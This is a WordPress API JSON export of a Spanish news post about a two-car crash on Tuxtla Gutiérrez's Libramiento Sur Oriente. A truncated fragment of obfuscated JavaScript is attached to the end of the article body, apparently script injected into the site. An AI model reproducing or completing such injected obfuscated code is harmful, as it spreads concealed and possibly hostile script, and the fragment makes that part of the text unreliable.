{"id":8479,"date":"2023-02-02T03:06:17","date_gmt":"2023-02-02T03:06:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8479"},"modified":"2023-02-02T03:06:18","modified_gmt":"2023-02-02T03:06:18","slug":"se-registra-fuerte-accidente-en-el-libramiento-sur-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8479","title":{"rendered":"Se registra fuerte accidente en el Libramiento Sur de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675307084867.jpg\" alt=\"\" class=\"wp-image-8480\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675307084867.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675307084867-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho.Agencia ReporteCiudadano, 1 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Dos unidades particulares protagonizaron un fuerte accidente este mi\u00e9rcoles en el Libramiento Sur Oriente de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales, las unidades involucradas fueron una camioneta Mazda CX 5 y un Chevrolet Aveo de color blanco.Las dos unidades circulaban en el Carril de alta, en el sentido de Oriente a Poniente cuando la conductora del coche se impact\u00f3 contra el muro de contenci\u00f3n de ambos carriles.Esto ocasion\u00f3 que la camioneta no alcanzara a frenar y se impactara y termin\u00f3 volcando.Las dos unidades fueron trasladadas a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 1 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Dos unidades particulares protagonizaron un fuerte accidente este mi\u00e9rcoles en el Libramiento Sur Oriente de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales, las unidades involucradas fueron una camioneta Mazda CX 5 y un Chevrolet Aveo de color blanco.Las dos unidades circulaban en el Carril de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8480,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8479","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8479"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8479\/revisions"}],"predecessor-version":[{"id":8481,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8479\/revisions\/8481"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8480"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}